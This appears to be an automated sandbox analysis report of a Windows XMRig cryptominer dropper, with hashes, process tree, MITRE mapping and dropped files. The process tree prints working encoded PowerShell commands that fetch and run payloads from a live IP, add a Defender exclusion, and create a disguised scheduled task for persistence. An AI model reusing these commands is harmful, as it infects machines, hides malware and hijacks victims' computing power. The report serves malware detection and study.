Analysis

  • max time kernel
    150s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    06-01-2023 11:14

General

  • Target

    file.exe

  • Size

    35KB

  • MD5

    4cf755615a13020d548efdb50075c7f4

  • SHA1

    d7fe35e37bda895f6ead22cda6e918716be2bbf1

  • SHA256

    6e8bf74388ea7fd0920ba751b8815fc3cf8b08718062695e1860ba9afa961e12

  • SHA512

    e0230b47232d3ff6ed0d4de0c63990cbd03e7141c62102045f95b4960ccd75407737426218dd643fee5028932f16e63eed6360d95cbe539882d7d4dfecb39348

  • SSDEEP

    768:l4fwXzHw0maEVLjCFHsGy4r/wOPpdwMNhghy0q9:l44XjxmaEVcu4kmTghy0w

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.194/go.png

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://62.204.41.194/F1.exe

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://62.204.41.194/me.png

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 14 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of WriteProcessMemory 58 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1708
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBnAG8ALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1552
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBOAG8AUwBsAGUAZQBwAC4AZQB4AGUAIgANAAoAJABXAGUAYgBGAGkAbABlACAAPQAgACIAaAB0AHQAcAA6AC8ALwA2ADIALgAyADAANAAuADQAMQAuADEAOQA0AC8ARgAxAC4AZQB4AGUAIgANAAoAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAVwBlAGIARgBpAGwAZQAsACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkADQAKAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAoACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAAkAFAAcgBvAGMATgBhAG0AZQAiACkA
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:684
      • C:\Users\Admin\AppData\Roaming\NoSleep.exe
        "C:\Users\Admin\AppData\Roaming\NoSleep.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1376
        • C:\Windows\System32\conhost.exe
          "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\NoSleep.exe"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:924
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe\""
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:992
            • C:\Windows\system32\schtasks.exe
              schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdateTaskMachineQC" /tr "\"C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe\""
              6⤵
              • Creates scheduled task(s)
              PID:1036
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1868
            • C:\Windows\system32\schtasks.exe
              schtasks /run /tn "GoogleUpdateTaskMachineQC"
              6⤵
                PID:980
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQAnAFwAQQBwAHAARABhAHQAYQAnAA==
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:560
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell" -enc IAAgACQAZgA1AD0AJwBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwAnADsAIAAkAGYAMQA9ACcAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAJwA7ACAAJABmADMAPQAnAGEAZABTAHQAcgBpAG4AZwAoACcAJwBoAHQAdABwADoALwAvADYAMgAuADIAMAA0AC4ANAAxAC4AMQA5ADQALwBtAGUALgBwAG4AZwAnACcAKQAnADsAJABHAE8ATwA9AEkAYABFAGAAWAAgACgAJABmADEALAAkAGYANQAsACQAZgAzACAALQBKAG8AaQBuACAAJwAnACkAfABJAGAARQBgAFgA
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:668
    • C:\Windows\system32\taskeng.exe
      taskeng.exe {3E914908-9DB4-4AF9-86CE-25F008965AF0} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]
      1⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1612
      • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
        C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
        2⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1704
        • C:\Windows\System32\conhost.exe
          "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe"
          3⤵
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:384
          • C:\Windows\System32\conhost.exe
            C:\Windows\System32\conhost.exe "cvxjxkjice"
            4⤵
              PID:1864
            • C:\Windows\System32\conhost.exe
              C:\Windows\System32\conhost.exe pjsnsurpv0 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZebSGUfj6Vuv+kPoPZ9FoidkTm/7TRz3Cxu5/LqhuwWCS2hvmHfyPTAWIo4zY5OcwjP+79VuJh5O5c9vMH8WB3WKocLPQQ3D/631f214VrDNh9z0jOLbJJ9YXALTSKeo3z0yqpo23wDcDd1T/hDfuDceoldVJQGMTDTCXN0Q0os5qQZpM/bbi7sbKmKkdCHj6mFIu02fq5LlHaQLCNyvHRzVgK320/ko7oR3JyhnmBQHtbZUpiFNPFJEf7lTC77qWxEJ3h4yjiCPgrTI6MoBbSgjAmpPlQgNd71RJ7lG0ikmSTeoT3CddgZH5TjpSuHbPN3ha82GVaI5+j+dJzAfNAaJfxYNDrhTxng1MpRAutdkSftro/iAbX8hcx7q/b7Qg7J3CyclBC4/Mwe/Jeo6Q9AKf6F7/3Yi99ifKM20LuEsFK/pU/n4DnNACnryf3RdME
              4⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:656

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Execution

      Scheduled Task

      1
      T1053

      Persistence

      Scheduled Task

      1
      T1053

      Privilege Escalation

      Scheduled Task

      1
      T1053

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        7KB

        MD5

        2bafff7d4f3f587ca1675e1a5e16e33a

        SHA1

        b9bcf1d873630dc2331f1fbfd1514eb864b1fdc2

        SHA256

        1d4565e968f9a97c89029740a9603f7a27d487429881465620328d6c5a664c73

        SHA512

        d257b19b54becbbfeedadcacad862eb7b49a0e9f363ed93a41b84782e76c7e4f2b46bcfecfdf1bd53d0fce3939819450130d2543c0060a4843b453524dbb11d4

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        7KB

        MD5

        2bafff7d4f3f587ca1675e1a5e16e33a

        SHA1

        b9bcf1d873630dc2331f1fbfd1514eb864b1fdc2

        SHA256

        1d4565e968f9a97c89029740a9603f7a27d487429881465620328d6c5a664c73

        SHA512

        d257b19b54becbbfeedadcacad862eb7b49a0e9f363ed93a41b84782e76c7e4f2b46bcfecfdf1bd53d0fce3939819450130d2543c0060a4843b453524dbb11d4

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        7KB

        MD5

        2bafff7d4f3f587ca1675e1a5e16e33a

        SHA1

        b9bcf1d873630dc2331f1fbfd1514eb864b1fdc2

        SHA256

        1d4565e968f9a97c89029740a9603f7a27d487429881465620328d6c5a664c73

        SHA512

        d257b19b54becbbfeedadcacad862eb7b49a0e9f363ed93a41b84782e76c7e4f2b46bcfecfdf1bd53d0fce3939819450130d2543c0060a4843b453524dbb11d4

      • C:\Users\Admin\AppData\Roaming\NoSleep.exe
        Filesize

        4.4MB

        MD5

        da256d1a520061b14d1cd013d99e84ff

        SHA1

        1aad91448144852bd1bf83dcb85bd14c6db160da

        SHA256

        feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

        SHA512

        8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

      • C:\Users\Admin\AppData\Roaming\NoSleep.exe
        Filesize

        4.4MB

        MD5

        da256d1a520061b14d1cd013d99e84ff

        SHA1

        1aad91448144852bd1bf83dcb85bd14c6db160da

        SHA256

        feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

        SHA512

        8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

      • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
        Filesize

        4.4MB

        MD5

        da256d1a520061b14d1cd013d99e84ff

        SHA1

        1aad91448144852bd1bf83dcb85bd14c6db160da

        SHA256

        feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

        SHA512

        8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

      • C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
        Filesize

        4.4MB

        MD5

        da256d1a520061b14d1cd013d99e84ff

        SHA1

        1aad91448144852bd1bf83dcb85bd14c6db160da

        SHA256

        feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

        SHA512

        8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

      • \Users\Admin\AppData\Roaming\NoSleep.exe
        Filesize

        4.4MB

        MD5

        da256d1a520061b14d1cd013d99e84ff

        SHA1

        1aad91448144852bd1bf83dcb85bd14c6db160da

        SHA256

        feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

        SHA512

        8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

      • \Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe
        Filesize

        4.4MB

        MD5

        da256d1a520061b14d1cd013d99e84ff

        SHA1

        1aad91448144852bd1bf83dcb85bd14c6db160da

        SHA256

        feb1d6051d70d694ffbb8a1663f9eb16f69967ca000251a38a57475922e77280

        SHA512

        8e1d9da1768a1388af28e29d202ed3f576ffb787ef3ae49badb1093eac121b1207923adba9b953f07e051e5d4a22b0976a20df3aa0ec9b7ebe216842380c6a71

      • memory/384-110-0x00000000006D0000-0x00000000006D6000-memory.dmp
        Filesize

        24KB

      • memory/560-68-0x000007FEF31B0000-0x000007FEF3BD3000-memory.dmp
        Filesize

        10.1MB

      • memory/560-58-0x0000000000000000-mapping.dmp
      • memory/560-83-0x000000000248B000-0x00000000024AA000-memory.dmp
        Filesize

        124KB

      • memory/560-82-0x0000000002484000-0x0000000002487000-memory.dmp
        Filesize

        12KB

      • memory/560-81-0x000000001B770000-0x000000001BA6F000-memory.dmp
        Filesize

        3.0MB

      • memory/560-77-0x000007FEF2650000-0x000007FEF31AD000-memory.dmp
        Filesize

        11.4MB

      • memory/560-75-0x0000000002484000-0x0000000002487000-memory.dmp
        Filesize

        12KB

      • memory/656-135-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/656-134-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/656-138-0x000000014036EAC4-mapping.dmp
      • memory/656-127-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/656-128-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/656-125-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/656-137-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/656-123-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/656-143-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/656-140-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/656-121-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/656-119-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/656-118-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/656-133-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/656-131-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/656-129-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/656-144-0x00000000000F0000-0x0000000000110000-memory.dmp
        Filesize

        128KB

      • memory/656-145-0x0000000000000000-0x0000000001000000-memory.dmp
        Filesize

        16.0MB

      • memory/656-146-0x0000000140000000-0x0000000140809000-memory.dmp
        Filesize

        8.0MB

      • memory/668-76-0x000007FEF2650000-0x000007FEF31AD000-memory.dmp
        Filesize

        11.4MB

      • memory/668-88-0x000000000237B000-0x000000000239A000-memory.dmp
        Filesize

        124KB

      • memory/668-86-0x0000000002374000-0x0000000002377000-memory.dmp
        Filesize

        12KB

      • memory/668-79-0x000000001B880000-0x000000001BB7F000-memory.dmp
        Filesize

        3.0MB

      • memory/668-109-0x000000000237B000-0x000000000239A000-memory.dmp
        Filesize

        124KB

      • memory/668-74-0x0000000002374000-0x0000000002377000-memory.dmp
        Filesize

        12KB

      • memory/668-142-0x0000000002374000-0x0000000002377000-memory.dmp
        Filesize

        12KB

      • memory/668-57-0x0000000000000000-mapping.dmp
      • memory/668-141-0x000000000237B000-0x000000000239A000-memory.dmp
        Filesize

        124KB

      • memory/668-66-0x000007FEF31B0000-0x000007FEF3BD3000-memory.dmp
        Filesize

        10.1MB

      • memory/684-69-0x000007FEF31B0000-0x000007FEF3BD3000-memory.dmp
        Filesize

        10.1MB

      • memory/684-56-0x0000000000000000-mapping.dmp
      • memory/684-73-0x00000000028E4000-0x00000000028E7000-memory.dmp
        Filesize

        12KB

      • memory/684-89-0x00000000028EB000-0x000000000290A000-memory.dmp
        Filesize

        124KB

      • memory/684-71-0x000007FEF2650000-0x000007FEF31AD000-memory.dmp
        Filesize

        11.4MB

      • memory/684-96-0x00000000028EB000-0x000000000290A000-memory.dmp
        Filesize

        124KB

      • memory/684-78-0x000000001B7D0000-0x000000001BACF000-memory.dmp
        Filesize

        3.0MB

      • memory/684-95-0x00000000028E4000-0x00000000028E7000-memory.dmp
        Filesize

        12KB

      • memory/684-85-0x00000000028E4000-0x00000000028E7000-memory.dmp
        Filesize

        12KB

      • memory/924-99-0x000000001B760000-0x000000001BB94000-memory.dmp
        Filesize

        4.2MB

      • memory/924-98-0x00000000000D0000-0x000000000052B000-memory.dmp
        Filesize

        4.4MB

      • memory/924-97-0x000000001BBC0000-0x000000001C01C000-memory.dmp
        Filesize

        4.4MB

      • memory/980-105-0x0000000000000000-mapping.dmp
      • memory/992-101-0x0000000000000000-mapping.dmp
      • memory/1036-104-0x0000000000000000-mapping.dmp
      • memory/1376-93-0x0000000000000000-mapping.dmp
      • memory/1552-87-0x00000000026CB000-0x00000000026EA000-memory.dmp
        Filesize

        124KB

      • memory/1552-80-0x000000001B7F0000-0x000000001BAEF000-memory.dmp
        Filesize

        3.0MB

      • memory/1552-84-0x00000000026C4000-0x00000000026C7000-memory.dmp
        Filesize

        12KB

      • memory/1552-70-0x000007FEF2650000-0x000007FEF31AD000-memory.dmp
        Filesize

        11.4MB

      • memory/1552-91-0x00000000026CB000-0x00000000026EA000-memory.dmp
        Filesize

        124KB

      • memory/1552-63-0x000007FEF31B0000-0x000007FEF3BD3000-memory.dmp
        Filesize

        10.1MB

      • memory/1552-90-0x00000000026C4000-0x00000000026C7000-memory.dmp
        Filesize

        12KB

      • memory/1552-72-0x00000000026C4000-0x00000000026C7000-memory.dmp
        Filesize

        12KB

      • memory/1552-59-0x000007FEFB7F1000-0x000007FEFB7F3000-memory.dmp
        Filesize

        8KB

      • memory/1552-55-0x0000000000000000-mapping.dmp
      • memory/1704-107-0x0000000000000000-mapping.dmp
      • memory/1708-54-0x0000000000880000-0x0000000000890000-memory.dmp
        Filesize

        64KB

      • memory/1864-113-0x0000000000000000-mapping.dmp
      • memory/1864-111-0x00000000000A0000-0x00000000000B9000-memory.dmp
        Filesize

        100KB

      • memory/1864-114-0x00000000000A0000-0x00000000000B9000-memory.dmp
        Filesize

        100KB

      • memory/1864-115-0x0000000001A40000-0x0000000001A5A000-memory.dmp
        Filesize

        104KB

      • memory/1864-116-0x0000000001AC0000-0x0000000001ACE000-memory.dmp
        Filesize

        56KB

      • memory/1868-103-0x0000000000000000-mapping.dmp